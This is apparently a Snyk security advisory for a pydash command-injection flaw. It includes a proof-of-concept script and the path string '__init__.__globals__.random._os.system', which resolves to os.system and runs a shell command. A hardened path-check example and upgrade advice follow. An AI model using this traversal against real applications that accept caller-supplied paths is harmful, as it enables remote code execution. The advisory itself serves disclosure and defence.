
# SNYK-PYTHON-PYDASH-5916518

Status: Published · CVSS 7.4 (High)

## Overview

[pydash](https://pypi.org/project/pydash) is "the kitchen sink of Python utility libraries for doing 'stuff' in a functional way", based on the Lo-Dash JavaScript library.

Affected versions of this package are vulnerable to Command Injection. A number of pydash methods, such as `pydash.objects.invoke()` and `pydash.collections.invoke_map()`, accept dotted paths (deep path strings) that select a nested Python object relative to the source object. Because each path segment is resolved with attribute and item lookups, a path can reach internal class attributes and dict items, and so retrieve, modify or invoke arbitrary nested Python objects. In particular, a bound method's `__globals__` attribute is the namespace of the module that defined it, which contains every module that script imported (`sys`, `random` and `pydash` in the PoC below; `random` in turn imports `os` as `_os`).

**Note:** `pydash.objects.invoke()` is exploitable when both of the following hold:

1. The source object (argument 1) is not a built-in object such as a list or dict. Built-in types implement `__init__` in C, so the bound `__init__` of a list or dict has no `__globals__` attribute and the `__init__.__globals__` path cannot be followed.
2. The attacker controls argument 2 (the path string) and argument 3 (the argument passed to the invoked method).

`pydash.collections.invoke_map()` is also affected, but harder to exploit because the attacker does not directly control the argument passed to the invoked function.

## PoC

```python
import sys
import random
import pydash


class Animal:
    # Any user-defined class works: its __init__ is a Python function,
    # so __init__.__globals__ exposes this module's namespace.
    def __init__(self, typ, age):
        self.type = typ
        self.age = age
        self.id = random.randint(1, 99999)


def poc(path, arg):
    """
    Use a malicious path to execute code via the __init__.__globals__ dict
    (not available with dict/list input objects?)
    I.e: pydash.invoke(obj, '__init__.__globals__.random._os.system', 'id')
    """
    obj = Animal('cat', 11)
    # path and arg are attacker-controlled: the path resolves to os.system
    # and arg becomes the shell command it runs.
    res = pydash.invoke(obj, path, arg)
    print(res)


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Missing args: %s <path> <arg>' % sys.argv[0])
        sys.exit(1)
    poc(sys.argv[1], sys.argv[2])
```

Run as `python poc.py '__init__.__globals__.random._os.system' id`. The path hops through `random` because the script never imports `os` directly; `random` does (as `_os`), so it is reachable from the module globals.

## Remediation

Upgrade `pydash` to version 6.0.0 or higher.
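The traversal described in the overview, as an added example that is neither pydash's code nor the gist's: a minimal deep-path resolver that behaves like a permissive deep-path helper, next to a hardened variant. It runs without pydash installed. `Animal`, `resolve_path`, `path_reachable`, `invoke_unsafe`, `is_path_allowed`, `invoke_safe` and `MALICIOUS_PATH` are names chosen for this illustration, not pydash APIs, and the hardened policy is an example mitigation rather than the change made in pydash 6.0.0. The malicious path here names `os` directly because this module imports it; the advisory's PoC reaches the same object via `random._os`.

```python
# Added example, not pydash's or the gist's code. All names below are
# illustrative; the hardened policy is one possible mitigation, not pydash's fix.
import os
import random
import types

# This module imports os, so the walk can name it directly. The advisory's
# PoC script only imports random and therefore hops via random._os instead.
MALICIOUS_PATH = "__init__.__globals__.os.system"


class Animal:
    """Stand-in user class, mirroring the advisory's PoC. Its __init__ is a
    plain Python function, so __init__.__globals__ is this module's namespace."""

    def __init__(self, typ, age):
        self.type = typ
        self.age = age
        self.id = random.randint(1, 99999)

    def speak(self, word):
        return f"{self.type} says {word}"


def resolve_path(obj, path):
    """Walk a dotted path: attribute lookup first, item lookup as fallback.
    Deliberately unrestricted, to show how a permissive resolver escapes."""
    cur = obj
    for key in path.split("."):
        try:
            cur = getattr(cur, key)
        except AttributeError:
            cur = cur[key]
    return cur


def path_reachable(obj, path):
    """True if the unrestricted resolver can reach the target from obj.
    False for list/dict sources: their bound __init__ is a C method-wrapper
    with no __globals__, which is prerequisite 1 in the advisory."""
    try:
        resolve_path(obj, path)
    except (AttributeError, KeyError, TypeError, IndexError):
        return False
    return True


def invoke_unsafe(obj, path, *args):
    """Vulnerable pattern: the caller controls both the path and the argument."""
    return resolve_path(obj, path)(*args)


# Node kinds an untrusted path must never step *through*: once the walk lands
# on a function, method, module or class, the next hop is arbitrary code.
_OPAQUE = (types.FunctionType, types.MethodType, types.BuiltinFunctionType,
           types.ModuleType, type)


def is_path_allowed(obj, path):
    """Hardened policy: no private/dunder segments, and no traversal through
    code or module objects before the final hop (which may be a method)."""
    keys = path.split(".")
    if any(k.startswith("_") for k in keys):
        return False
    cur = obj
    for key in keys[:-1]:
        if isinstance(cur, _OPAQUE):
            return False
        try:
            cur = resolve_path(cur, key)
        except (AttributeError, KeyError, TypeError, IndexError):
            return False
    return True


def invoke_safe(obj, path, *args):
    """Same call shape as invoke_unsafe, but refuses paths the policy rejects."""
    if not is_path_allowed(obj, path):
        raise ValueError(f"refusing untrusted path {path!r}")
    return resolve_path(obj, path)(*args)


def escape_reaches_os_system():
    """Shows the unrestricted walk landing on os.system without calling it."""
    return resolve_path(Animal("cat", 11), MALICIOUS_PATH) is os.system


if __name__ == "__main__":
    cat = Animal("cat", 11)
    print("unrestricted resolver reaches os.system:", escape_reaches_os_system())
    print("same path from a dict source reachable:", path_reachable({}, MALICIOUS_PATH))
    print(invoke_unsafe(cat, "speak", "hi"))
    print(invoke_safe(cat, "speak", "hi"))
    print("malicious path allowed by hardened policy:", is_path_allowed(cat, MALICIOUS_PATH))
```

The policy rejects any `_`-prefixed segment and any hop that would traverse a function, method, module or class, which closes both the `__init__.__globals__` route and variants such as `speak.__func__`. It is a defence for code that must accept caller-supplied paths; the simpler fix is not to pass attacker-controlled path strings at all, and to upgrade pydash as the advisory says.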
## References

- [GitHub Commit](https://github.com/dgilland/pydash/commit/6ff0831ad285fff937cafd2a853f20cc9ae92021)
- [GitHub Gist](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca)

## Risk Scores

CVSS 3.1 base score: 7.4
Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P`

## Affected Products

No vendor/product/version entries are listed.

## Timeline

- Sep 24, 2023: CVE updated
- Sep 26, 2023: CVE published